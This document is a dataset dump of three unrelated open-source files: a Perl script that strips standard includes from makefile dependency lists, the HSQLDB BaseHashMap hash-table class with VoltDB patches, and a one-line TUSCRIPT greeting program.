text
stringlengths
2
100k
meta
dict
#!/usr/local/bin/perl -w # Clean the dependency list in a makefile of standard includes... # Written by Ben Laurie <[email protected]> 19 Jan 1999 use strict; while(<STDIN>) { print; last if /^# DO NOT DELETE THIS LINE/; } my %files; my $thisfile=""; while(<STDIN>) { my ($dummy, $file,$deps)=/^((.*):)? (.*)$/; my $origfile=""; $thisfile=$file if defined $file; next if !defined $deps; $origfile=$thisfile; $origfile=~s/\.o$/.c/; my @deps=split ' ',$deps; @deps=grep(!/^\//,@deps); @deps=grep(!/^\\$/,@deps); @deps=grep(!/^$origfile$/,@deps); # pull out the kludged kerberos header (if present). @deps=grep(!/^[.\/]+\/krb5.h/,@deps); push @{$files{$thisfile}},@deps; } my $file; foreach $file (sort keys %files) { my $len=0; my $dep; my $origfile=$file; $origfile=~s/\.o$/.c/; $file=~s/^\.\///; push @{$files{$file}},$origfile; my $prevdep=""; # Remove leading ./ before sorting my @deps = map { $_ =~ s/^\.\///; $_ } @{$files{$file}}; foreach $dep (sort @deps) { next if $prevdep eq $dep; # to exterminate duplicates... $prevdep = $dep; $len=0 if $len+length($dep)+1 >= 80; if($len == 0) { print "\n$file:"; $len=length($file)+1; } print " $dep"; $len+=length($dep)+1; } } print "\n";
{ "pile_set_name": "Github" }
/* Copyright (c) 2001-2009, The HSQL Development Group * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions are met: * * Redistributions of source code must retain the above copyright notice, this * list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright notice, * this list of conditions and the following disclaimer in the documentation * and/or other materials provided with the distribution. * * Neither the name of the HSQL Development Group nor the names of its * contributors may be used to endorse or promote products derived from this * software without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL HSQL DEVELOPMENT GROUP, HSQLDB.ORG, * OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, * EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND * ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS * SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ package org.hsqldb_voltpatches.store; import java.util.NoSuchElementException; import org.hsqldb_voltpatches.Expression; import org.hsqldb_voltpatches.ExpressionAggregate; import org.hsqldb_voltpatches.lib.ArrayCounter; import org.hsqldb_voltpatches.lib.Iterator; /** * Base class for hash tables or sets. The exact type of the structure is * defined by the constructor. Each instance has at least a keyTable array * and a HashIndex instance for looking up the keys into this table. Instances * that are maps also have a valueTable the same size as the keyTable. * * Special getOrAddXXX() methods are used for object maps in some subclasses. * * @author Fred Toussi (fredt@users dot sourceforge.net) * @version 1.9.0 * @since 1.7.2 */ public class BaseHashMap { /* data store: keys: {array of primitive | array of object} values: {none | array of primitive | array of object} same size as keys objects support : hashCode(), equals() implemented types of keyTable: {objectKeyTable: variable size Object[] array for keys | intKeyTable: variable size int[] for keys | longKeyTable: variable size long[] for keys } implemented types of valueTable: {objectValueTable: variable size Object[] array for values | intValueTable: variable size int[] for values | longValueTable: variable size long[] for values} valueTable does not exist for sets or for object pools hash index: hashTable: fixed size int[] array for hash lookup into keyTable linkTable: pointer to the next key ; size equal or larger than hashTable but equal to the valueTable access count table: {none | variable size int[] array for access count} same size as xxxKeyTable */ // boolean isIntKey; boolean isLongKey; boolean isObjectKey; boolean isNoValue; boolean isIntValue; boolean isLongValue; boolean isObjectValue; protected boolean isList; // private ValuesIterator valuesIterator; // protected HashIndex hashIndex; // protected int[] intKeyTable; protected Object[] objectKeyTable; protected long[] longKeyTable; // protected int[] intValueTable; protected Object[] objectValueTable; protected long[] longValueTable; // int accessMin; protected int accessCount; protected int[] accessTable; protected boolean[] multiValueTable; // final float loadFactor; final int initialCapacity; int threshold; int maxCapacity; protected int purgePolicy = NO_PURGE; protected boolean minimizeOnEmpty; // boolean hasZeroKey; int zeroKeyIndex = -1; // keyOrValueTypes protected static final int noKeyOrValue = 0; protected static final int intKeyOrValue = 1; protected static final int longKeyOrValue = 2; protected static final int objectKeyOrValue = 3; // purgePolicy protected static final int NO_PURGE = 0; protected static final int PURGE_ALL = 1; protected static final int PURGE_HALF = 2; protected static final int PURGE_QUARTER = 3; protected BaseHashMap(int initialCapacity, int keyType, int valueType, boolean hasAccessCount) throws IllegalArgumentException { if (initialCapacity <= 0) { throw new IllegalArgumentException(); } // CHERRY PICK to prevent a flaky crash? if (initialCapacity < 3) { initialCapacity = 3; } // End of CHERRY PICK to prevent a flaky crash? this.loadFactor = 1; // can use any value if necessary this.initialCapacity = initialCapacity; threshold = initialCapacity; if (threshold < 3) { threshold = 3; } int hashtablesize = (int) (initialCapacity * loadFactor); if (hashtablesize < 3) { hashtablesize = 3; } hashIndex = new HashIndex(hashtablesize, initialCapacity, true); int arraySize = threshold; if (keyType == BaseHashMap.intKeyOrValue) { isIntKey = true; intKeyTable = new int[arraySize]; } else if (keyType == BaseHashMap.objectKeyOrValue) { isObjectKey = true; objectKeyTable = new Object[arraySize]; } else { isLongKey = true; longKeyTable = new long[arraySize]; } if (valueType == BaseHashMap.intKeyOrValue) { isIntValue = true; intValueTable = new int[arraySize]; } else if (valueType == BaseHashMap.objectKeyOrValue) { isObjectValue = true; objectValueTable = new Object[arraySize]; } else if (valueType == BaseHashMap.longKeyOrValue) { isLongValue = true; longValueTable = new long[arraySize]; } else { isNoValue = true; } if (hasAccessCount) { accessTable = new int[arraySize]; } } protected int getLookup(Object key, int hash) { int lookup = hashIndex.getLookup(hash); Object tempKey; for (; lookup >= 0; lookup = hashIndex.getNextLookup(lookup)) { tempKey = objectKeyTable[lookup]; if (key.equals(tempKey)) { return lookup; } } return lookup; } // extended version for getLookup(Object key, int hash), except same Expression with different // queryTableColumnIndex are considered as different keys protected int getLookupSameIndex(Object key, int hash) { if (!(key instanceof Expression)) { return getLookup(key, hash); } Expression expression = (Expression) key; int lookup = hashIndex.getLookup(hash); Expression tempKey; for (; lookup >= 0; lookup = hashIndex.getNextLookup(lookup)) { tempKey = (Expression) objectKeyTable[lookup]; if (expression.equals(tempKey) && expression.queryTableColumnIndexEquals(tempKey)) { return lookup; } } return lookup; } protected int getLookup(int key) { int lookup = hashIndex.getLookup(key); int tempKey; for (; lookup >= 0; lookup = hashIndex.linkTable[lookup]) { tempKey = intKeyTable[lookup]; if (key == tempKey) { return lookup; } } return lookup; } protected int getLookup(long key) { int lookup = hashIndex.getLookup((int) key); long tempKey; for (; lookup >= 0; lookup = hashIndex.getNextLookup(lookup)) { tempKey = longKeyTable[lookup]; if (key == tempKey) { return lookup; } } return lookup; } protected Iterator getValuesIterator(Object key, int hash) { int lookup = getLookup(key, hash); if (valuesIterator == null) { valuesIterator = new ValuesIterator(); } valuesIterator.reset(key, lookup); return valuesIterator; } /** * generic method for adding or removing keys */ protected Object addOrRemove(long longKey, long longValue, Object objectKey, Object objectValue, boolean remove) { int hash = (int) longKey; if (isObjectKey) { if (objectKey == null) { return null; } hash = objectKey.hashCode(); } int index = hashIndex.getHashIndex(hash); int lookup = hashIndex.hashTable[index]; int lastLookup = -1; Object returnValue = null; for (; lookup >= 0; lastLookup = lookup, lookup = hashIndex.getNextLookup(lookup)) { if (isObjectKey) { // A VoltDB extension to prevent an intermittent NPE on catalogUpdate? if (objectKey.equals(objectKeyTable[lookup])) { /* disabled 1 line ... if (objectKeyTable[lookup].equals(objectKey)) { ... disabled 1 line */ // End of VoltDB extension break; } } else if (isIntKey) { if (longKey == intKeyTable[lookup]) { break; } } else if (isLongKey) { if (longKey == longKeyTable[lookup]) { break; } } } if (lookup >= 0) { if (remove) { if (isObjectKey) { objectKeyTable[lookup] = null; } else { if (longKey == 0) { hasZeroKey = false; zeroKeyIndex = -1; } if (isIntKey) { intKeyTable[lookup] = 0; } else { longKeyTable[lookup] = 0; } } if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; } else if (isIntValue) { intValueTable[lookup] = 0; } else if (isLongValue) { longValueTable[lookup] = 0; } hashIndex.unlinkNode(index, lastLookup, lookup); if (accessTable != null) { accessTable[lookup] = 0; } if (minimizeOnEmpty && hashIndex.elementCount == 0) { rehash(initialCapacity); } return returnValue; } if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = objectValue; } else if (isIntValue) { intValueTable[lookup] = (int) longValue; } else if (isLongValue) { longValueTable[lookup] = longValue; } if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } // not found if (remove) { return null; } if (hashIndex.elementCount >= threshold) { // should throw maybe, if reset returns false? if (reset()) { return addOrRemove(longKey, longValue, objectKey, objectValue, remove); } else { return null; } } lookup = hashIndex.linkNode(index, lastLookup); // type dependent block if (isObjectKey) { objectKeyTable[lookup] = objectKey; } else if (isIntKey) { intKeyTable[lookup] = (int) longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } else if (isLongKey) { longKeyTable[lookup] = longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } if (isObjectValue) { objectValueTable[lookup] = objectValue; } else if (isIntValue) { intValueTable[lookup] = (int) longValue; } else if (isLongValue) { longValueTable[lookup] = longValue; } // if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } // if the object added is an Aggregate expression, always add it to the set even it's already in the set // see ENG-18917 protected Object addOrRemoveAlwaysIfAggregate(long longKey, long longValue, Object objectKey, Object objectValue, boolean remove) { int hash = (int) longKey; if (isObjectKey) { if (objectKey == null) { return null; } hash = objectKey.hashCode(); } int index = hashIndex.getHashIndex(hash); int lookup = hashIndex.hashTable[index]; int lastLookup = -1; Object returnValue = null; for (; lookup >= 0; lastLookup = lookup, lookup = hashIndex.getNextLookup(lookup)) { if (isObjectKey) { // A VoltDB extension to prevent an intermittent NPE on catalogUpdate? if (objectKey.equals(objectKeyTable[lookup])) { if (!(objectKey instanceof ExpressionAggregate)) { break; } // End of VoltDB extension } } else if (isIntKey) { if (longKey == intKeyTable[lookup]) { break; } } else if (isLongKey) { if (longKey == longKeyTable[lookup]) { break; } } } if (lookup >= 0) { if (remove) { if (isObjectKey) { objectKeyTable[lookup] = null; } else { if (longKey == 0) { hasZeroKey = false; zeroKeyIndex = -1; } if (isIntKey) { intKeyTable[lookup] = 0; } else { longKeyTable[lookup] = 0; } } if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; } else if (isIntValue) { intValueTable[lookup] = 0; } else if (isLongValue) { longValueTable[lookup] = 0; } hashIndex.unlinkNode(index, lastLookup, lookup); if (accessTable != null) { accessTable[lookup] = 0; } if (minimizeOnEmpty && hashIndex.elementCount == 0) { rehash(initialCapacity); } return returnValue; } if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = objectValue; } else if (isIntValue) { intValueTable[lookup] = (int) longValue; } else if (isLongValue) { longValueTable[lookup] = longValue; } if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } // not found if (remove) { return null; } if (hashIndex.elementCount >= threshold) { // should throw maybe, if reset returns false? if (reset()) { return addOrRemove(longKey, longValue, objectKey, objectValue, remove); } else { return null; } } lookup = hashIndex.linkNode(index, lastLookup); // type dependent block if (isObjectKey) { objectKeyTable[lookup] = objectKey; } else if (isIntKey) { intKeyTable[lookup] = (int) longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } else if (isLongKey) { longKeyTable[lookup] = longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } if (isObjectValue) { objectValueTable[lookup] = objectValue; } else if (isIntValue) { intValueTable[lookup] = (int) longValue; } else if (isLongValue) { longValueTable[lookup] = longValue; } // if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } /** * generic method for adding or removing key / values in multi-value * maps */ protected Object addOrRemoveMultiVal(long longKey, long longValue, Object objectKey, Object objectValue, boolean removeKey, boolean removeValue) { int hash = (int) longKey; if (isObjectKey) { if (objectKey == null) { return null; } hash = objectKey.hashCode(); } int index = hashIndex.getHashIndex(hash); int lookup = hashIndex.hashTable[index]; int lastLookup = -1; Object returnValue = null; boolean multiValue = false; for (; lookup >= 0; lastLookup = lookup, lookup = hashIndex.getNextLookup(lookup)) { if (isObjectKey) { if (objectKeyTable[lookup].equals(objectKey)) { if (removeKey) { while (true) { objectKeyTable[lookup] = null; returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; hashIndex.unlinkNode(index, lastLookup, lookup); multiValueTable[lookup] = false; lookup = hashIndex.hashTable[index]; if (lookup < 0 || !objectKeyTable[lookup].equals( objectKey)) { return returnValue; } } } else { if (objectValueTable[lookup].equals(objectValue)) { if (removeValue) { objectKeyTable[lookup] = null; returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; hashIndex.unlinkNode(index, lastLookup, lookup); multiValueTable[lookup] = false; lookup = lastLookup; return returnValue; } else { return objectValueTable[lookup]; } } } multiValue = true; } } else if (isIntKey) { if (longKey == intKeyTable[lookup]) { if (removeKey) { while (true) { if (longKey == 0) { hasZeroKey = false; zeroKeyIndex = -1; } intKeyTable[lookup] = 0; intValueTable[lookup] = 0; hashIndex.unlinkNode(index, lastLookup, lookup); multiValueTable[lookup] = false; lookup = hashIndex.hashTable[index]; if (lookup < 0 || longKey != intKeyTable[lookup]) { return null; } } } else { if (intValueTable[lookup] == longValue) { return null; } } multiValue = true; } } else if (isLongKey) { if (longKey == longKeyTable[lookup]) { if (removeKey) { while (true) { if (longKey == 0) { hasZeroKey = false; zeroKeyIndex = -1; } longKeyTable[lookup] = 0; longValueTable[lookup] = 0; hashIndex.unlinkNode(index, lastLookup, lookup); multiValueTable[lookup] = false; lookup = hashIndex.hashTable[index]; if (lookup < 0 || longKey != longKeyTable[lookup]) { return null; } } } else { if (intValueTable[lookup] == longValue) { return null; } } multiValue = true; } } } if (removeKey || removeValue) { return returnValue; } if (hashIndex.elementCount >= threshold) { // should throw maybe, if reset returns false? if (reset()) { return addOrRemoveMultiVal(longKey, longValue, objectKey, objectValue, removeKey, removeValue); } else { return null; } } lookup = hashIndex.linkNode(index, lastLookup); // type dependent block if (isObjectKey) { objectKeyTable[lookup] = objectKey; } else if (isIntKey) { intKeyTable[lookup] = (int) longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } else if (isLongKey) { longKeyTable[lookup] = longKey; if (longKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } } if (isObjectValue) { objectValueTable[lookup] = objectValue; } else if (isIntValue) { intValueTable[lookup] = (int) longValue; } else if (isLongValue) { longValueTable[lookup] = longValue; } if (multiValue) { multiValueTable[lookup] = true; } // if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } /** * type-specific method for adding or removing keys in int->Object maps */ protected Object addOrRemove(int intKey, Object objectValue, boolean remove) { int hash = intKey; int index = hashIndex.getHashIndex(hash); int lookup = hashIndex.hashTable[index]; int lastLookup = -1; Object returnValue = null; for (; lookup >= 0; lastLookup = lookup, lookup = hashIndex.getNextLookup(lookup)) { if (intKey == intKeyTable[lookup]) { break; } } if (lookup >= 0) { if (remove) { if (intKey == 0) { hasZeroKey = false; zeroKeyIndex = -1; } intKeyTable[lookup] = 0; returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; hashIndex.unlinkNode(index, lastLookup, lookup); if (accessTable != null) { accessTable[lookup] = 0; } return returnValue; } if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = objectValue; } if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } // not found if (remove) { return returnValue; } if (hashIndex.elementCount >= threshold) { if (reset()) { return addOrRemove(intKey, objectValue, remove); } else { return null; } } lookup = hashIndex.linkNode(index, lastLookup); intKeyTable[lookup] = intKey; if (intKey == 0) { hasZeroKey = true; zeroKeyIndex = lookup; } objectValueTable[lookup] = objectValue; if (accessTable != null) { accessTable[lookup] = accessCount++; } return returnValue; } /** * type specific method for Object sets or Object->Object maps */ protected Object removeObject(Object objectKey, boolean removeRow) { if (objectKey == null) { return null; } int hash = objectKey.hashCode(); int index = hashIndex.getHashIndex(hash); int lookup = hashIndex.hashTable[index]; int lastLookup = -1; Object returnValue = null; for (; lookup >= 0; lastLookup = lookup, lookup = hashIndex.getNextLookup(lookup)) { if (objectKeyTable[lookup].equals(objectKey)) { objectKeyTable[lookup] = null; hashIndex.unlinkNode(index, lastLookup, lookup); if (isObjectValue) { returnValue = objectValueTable[lookup]; objectValueTable[lookup] = null; } if (removeRow) { removeRow(lookup); } return returnValue; } } // not found return returnValue; } protected boolean reset() { if (maxCapacity == 0 || maxCapacity > threshold) { rehash(hashIndex.linkTable.length * 2); return true; } else if (purgePolicy == PURGE_ALL) { clear(); return true; } else if (purgePolicy == PURGE_QUARTER) { clear(threshold / 4, threshold >> 8); return true; } else if (purgePolicy == PURGE_HALF) { clear(threshold / 2, threshold >> 8); return true; } else if (purgePolicy == NO_PURGE) { return false; } return false; } /** * rehash uses existing key and element arrays. key / value pairs are * put back into the arrays from the top, removing any gaps. any redundant * key / value pairs duplicated at the end of the array are then cleared. * * newCapacity must be larger or equal to existing number of elements. */ protected void rehash(int newCapacity) { int limitLookup = hashIndex.newNodePointer; boolean oldZeroKey = hasZeroKey; int oldZeroKeyIndex = zeroKeyIndex; if (newCapacity < hashIndex.elementCount) { return; } hashIndex.reset((int) (newCapacity * loadFactor), newCapacity); if (multiValueTable != null) { int counter = multiValueTable.length; while (--counter >= 0) { multiValueTable[counter] = false; } } hasZeroKey = false; zeroKeyIndex = -1; threshold = newCapacity; for (int lookup = -1; (lookup = nextLookup(lookup, limitLookup, oldZeroKey, oldZeroKeyIndex)) < limitLookup; ) { long longKey = 0; long longValue = 0; Object objectKey = null; Object objectValue = null; if (isObjectKey) { objectKey = objectKeyTable[lookup]; } else if (isIntKey) { longKey = intKeyTable[lookup]; } else { longKey = longKeyTable[lookup]; } if (isObjectValue) { objectValue = objectValueTable[lookup]; } else if (isIntValue) { longValue = intValueTable[lookup]; } else if (isLongValue) { longValue = longValueTable[lookup]; } if (multiValueTable == null) { addOrRemove(longKey, longValue, objectKey, objectValue, false); } else { addOrRemoveMultiVal(longKey, longValue, objectKey, objectValue, false, false); } if (accessTable != null) { accessTable[hashIndex.elementCount - 1] = accessTable[lookup]; } } resizeElementArrays(hashIndex.newNodePointer, newCapacity); } /** * resize the arrays contianing the key / value data */ private void resizeElementArrays(int dataLength, int newLength) { Object temp; int usedLength = newLength > dataLength ? dataLength : newLength; if (isIntKey) { temp = intKeyTable; intKeyTable = new int[newLength]; System.arraycopy(temp, 0, intKeyTable, 0, usedLength); } if (isIntValue) { temp = intValueTable; intValueTable = new int[newLength]; System.arraycopy(temp, 0, intValueTable, 0, usedLength); } if (isLongKey) { temp = longKeyTable; longKeyTable = new long[newLength]; System.arraycopy(temp, 0, longKeyTable, 0, usedLength); } if (isLongValue) { temp = longValueTable; longValueTable = new long[newLength]; System.arraycopy(temp, 0, longValueTable, 0, usedLength); } if (isObjectKey) { temp = objectKeyTable; objectKeyTable = new Object[newLength]; System.arraycopy(temp, 0, objectKeyTable, 0, usedLength); } if (isObjectValue) { temp = objectValueTable; objectValueTable = new Object[newLength]; System.arraycopy(temp, 0, objectValueTable, 0, usedLength); } if (accessTable != null) { temp = accessTable; accessTable = new int[newLength]; System.arraycopy(temp, 0, accessTable, 0, usedLength); } if (multiValueTable != null) { temp = multiValueTable; multiValueTable = new boolean[newLength]; System.arraycopy(temp, 0, multiValueTable, 0, usedLength); } } /** * clear all the key / value data in a range. */ private void clearElementArrays(final int from, final int to) { if (isIntKey) { int counter = to; while (--counter >= from) { intKeyTable[counter] = 0; } } else if (isLongKey) { int counter = to; while (--counter >= from) { longKeyTable[counter] = 0; } } else if (isObjectKey) { int counter = to; while (--counter >= from) { objectKeyTable[counter] = null; } } if (isIntValue) { int counter = to; while (--counter >= from) { intValueTable[counter] = 0; } } else if (isLongValue) { int counter = to; while (--counter >= from) { longValueTable[counter] = 0; } } else if (isObjectValue) { int counter = to; while (--counter >= from) { objectValueTable[counter] = null; } } if (accessTable != null) { int counter = to; while (--counter >= from) { accessTable[counter] = 0; } } if (multiValueTable != null) { int counter = to; while (--counter >= from) { multiValueTable[counter] = false; } } } /** * move the elements after a removed key / value pair to fill the gap */ void removeFromElementArrays(int lookup) { int arrayLength = hashIndex.linkTable.length; if (isIntKey) { Object array = intKeyTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); intKeyTable[arrayLength - 1] = 0; } if (isLongKey) { Object array = longKeyTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); longKeyTable[arrayLength - 1] = 0; } if (isObjectKey) { Object array = objectKeyTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); objectKeyTable[arrayLength - 1] = null; } if (isIntValue) { Object array = intValueTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); intValueTable[arrayLength - 1] = 0; } if (isLongValue) { Object array = longValueTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); longValueTable[arrayLength - 1] = 0; } if (isObjectValue) { Object array = objectValueTable; System.arraycopy(array, lookup + 1, array, lookup, arrayLength - lookup - 1); objectValueTable[arrayLength - 1] = null; } } /** * find the next lookup in the key/value tables with an entry * allows the use of old limit and zero int key attributes */ int nextLookup(int lookup, int limitLookup, boolean hasZeroKey, int zeroKeyIndex) { for (++lookup; lookup < limitLookup; lookup++) { if (isObjectKey) { if (objectKeyTable[lookup] != null) { return lookup; } } else if (isIntKey) { if (intKeyTable[lookup] != 0) { return lookup; } else if (hasZeroKey && lookup == zeroKeyIndex) { return lookup; } } else { if (longKeyTable[lookup] != 0) { return lookup; } else if (hasZeroKey && lookup == zeroKeyIndex) { return lookup; } } } return lookup; } /** * find the next lookup in the key/value tables with an entry * uses current limits and zero integer key state */ protected int nextLookup(int lookup) { for (++lookup; lookup < hashIndex.newNodePointer; lookup++) { if (isObjectKey) { if (objectKeyTable[lookup] != null) { return lookup; } } else if (isIntKey) { if (intKeyTable[lookup] != 0) { return lookup; } else if (hasZeroKey && lookup == zeroKeyIndex) { return lookup; } } else { if (longKeyTable[lookup] != 0) { return lookup; } else if (hasZeroKey && lookup == zeroKeyIndex) { return lookup; } } } return -1; } /** * row must already been freed of key / element */ protected void removeRow(int lookup) { hashIndex.removeEmptyNode(lookup); removeFromElementArrays(lookup); } /** * Clear the map completely. */ public void clear() { if (hashIndex.modified) { accessCount = 0; accessMin = accessCount; hasZeroKey = false; zeroKeyIndex = -1; clearElementArrays(0, hashIndex.linkTable.length); hashIndex.clear(); if (minimizeOnEmpty) { rehash(initialCapacity); } } } /** * Return the max accessCount value for count elements with the lowest * access count. Always return at least accessMin + 1 */ public int getAccessCountCeiling(int count, int margin) { return ArrayCounter.rank(accessTable, hashIndex.newNodePointer, count, accessMin + 1, accessCount, margin); } /** * This is called after all elements below count accessCount have been * removed */ public void setAccessCountFloor(int count) { accessMin = count; } public int incrementAccessCount() { return ++accessCount; } /** * Clear approximately count elements from the map, starting with * those with low accessTable ranking. * * Only for maps with Object key table */ protected void clear(int count, int margin) { if (margin < 64) { margin = 64; } int maxlookup = hashIndex.newNodePointer; int accessBase = getAccessCountCeiling(count, margin); for (int lookup = 0; lookup < maxlookup; lookup++) { Object o = objectKeyTable[lookup]; if (o != null && accessTable[lookup] < accessBase) { removeObject(o, false); } } accessMin = accessBase; } protected void resetAccessCount() { if (accessCount < Integer.MAX_VALUE) { return; } accessMin >>= 2; accessCount >>= 2; int i = accessTable.length; while (--i >= 0) { accessTable[i] >>= 2; } } public int capacity() { return hashIndex.linkTable.length; } public int size() { return hashIndex.elementCount; } public boolean isEmpty() { return hashIndex.elementCount == 0; } protected boolean containsKey(Object key) { if (key == null) { return false; } // CHERRY PICK to prevent a flaky crash? if (hashIndex.elementCount == 0) { return false; } // End of CHERRY PICK int lookup = getLookup(key, key.hashCode()); return lookup == -1 ? false : true; } protected boolean containsKey(int key) { // CHERRY PICK to prevent a flaky crash? if (hashIndex.elementCount == 0) { return false; } // End of CHERRY PICK int lookup = getLookup(key); return lookup == -1 ? false : true; } protected boolean containsKey(long key) { // CHERRY PICK to prevent a flaky crash? if (hashIndex.elementCount == 0) { return false; } // End of CHERRY PICK int lookup = getLookup(key); return lookup == -1 ? false : true; } protected boolean containsValue(Object value) { int lookup = 0; // CHERRY PICK to prevent a flaky crash? if (hashIndex.elementCount == 0) { return false; } // End of CHERRY PICK if (value == null) { for (; lookup < hashIndex.newNodePointer; lookup++) { if (objectValueTable[lookup] == null) { if (isObjectKey) { if (objectKeyTable[lookup] != null) { return true; } } else if (isIntKey) { if (intKeyTable[lookup] != 0) { return true; } else if (hasZeroKey && lookup == zeroKeyIndex) { return true; } } else { if (longKeyTable[lookup] != 0) { return true; } else if (hasZeroKey && lookup == zeroKeyIndex) { return true; } } } } } else { for (; lookup < hashIndex.newNodePointer; lookup++) { if (value.equals(objectValueTable[lookup])) { return true; } } } return false; } /** * Currently only for object maps */ protected class ValuesIterator implements org.hsqldb_voltpatches.lib.Iterator { int lookup = -1; Object key; private void reset(Object key, int lookup) { this.key = key; this.lookup = lookup; } public boolean hasNext() { return lookup != -1; } public Object next() throws NoSuchElementException { if (lookup == -1) { return null; } Object value = BaseHashMap.this.objectValueTable[lookup]; while (true) { lookup = BaseHashMap.this.hashIndex.getNextLookup(lookup); if (lookup == -1 || BaseHashMap.this.objectKeyTable[lookup].equals( key)) { break; } } return value; } public int nextInt() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public long nextLong() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public void remove() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public void setValue(Object value) { throw new NoSuchElementException("Hash Iterator"); } } protected class MultiValueKeyIterator implements Iterator { boolean keys; int lookup = -1; int counter; boolean removed; public MultiValueKeyIterator() { toNextLookup(); } private void toNextLookup() { while (true) { lookup = nextLookup(lookup); if (lookup == -1 || !multiValueTable[lookup]) { break; } } } public boolean hasNext() { return lookup != -1; } public Object next() throws NoSuchElementException { Object value = objectKeyTable[lookup]; toNextLookup(); return value; } public int nextInt() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public long nextLong() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public void remove() throws NoSuchElementException { throw new NoSuchElementException("Hash Iterator"); } public void setValue(Object value) { throw new NoSuchElementException("Hash Iterator"); } } /** * Iterator returns Object, int or long and is used both for keys and * values */ protected class BaseHashIterator implements Iterator { boolean keys; int lookup = -1; int counter; boolean removed; /** * default is iterator for values */ public BaseHashIterator() {} public BaseHashIterator(boolean keys) { this.keys = keys; } public boolean hasNext() { return counter < hashIndex.elementCount; } public Object next() throws NoSuchElementException { if ((keys && !isObjectKey) || (!keys && !isObjectValue)) { throw new NoSuchElementException("Hash Iterator"); } removed = false; if (hasNext()) { counter++; lookup = nextLookup(lookup); if (keys) { return objectKeyTable[lookup]; } else { return objectValueTable[lookup]; } } throw new NoSuchElementException("Hash Iterator"); } public int nextInt() throws NoSuchElementException { if ((keys && !isIntKey) || (!keys && !isIntValue)) { throw new NoSuchElementException("Hash Iterator"); } removed = false; if (hasNext()) { counter++; lookup = nextLookup(lookup); if (keys) { return intKeyTable[lookup]; } else { return intValueTable[lookup]; } } throw new NoSuchElementException("Hash Iterator"); } public long nextLong() throws NoSuchElementException { if ((!isLongKey || !keys)) { throw new NoSuchElementException("Hash Iterator"); } removed = false; if (hasNext()) { counter++; lookup = nextLookup(lookup); if (keys) { return longKeyTable[lookup]; } else { return longValueTable[lookup]; } } throw new NoSuchElementException("Hash Iterator"); } public void remove() throws NoSuchElementException { if (removed) { throw new NoSuchElementException("Hash Iterator"); } counter--; removed = true; if (BaseHashMap.this.isObjectKey) { if (multiValueTable == null) { addOrRemove(0, 0, objectKeyTable[lookup], null, true); } else { if (keys) { addOrRemoveMultiVal(0, 0, objectKeyTable[lookup], null, true, false); } else { addOrRemoveMultiVal(0, 0, objectKeyTable[lookup], objectValueTable[lookup], false, true); } } } else if (isIntKey) { addOrRemove(intKeyTable[lookup], 0, null, null, true); } else { addOrRemove(longKeyTable[lookup], 0, null, null, true); } if (isList) { // CHERRY PICK to prevent a flaky crash? removeRow(lookup); // End of CHERRY PICK lookup--; } } public void setValue(Object value) { if (keys) { throw new NoSuchElementException(); } objectValueTable[lookup] = value; } public int getAccessCount() { if (removed || accessTable == null) { throw new NoSuchElementException(); } return accessTable[lookup]; } public int getLookup() { return lookup; } } }
{ "pile_set_name": "Github" }
$$ MODE TUSCRIPT PRINT "Goodbye, World!"
{ "pile_set_name": "Github" }
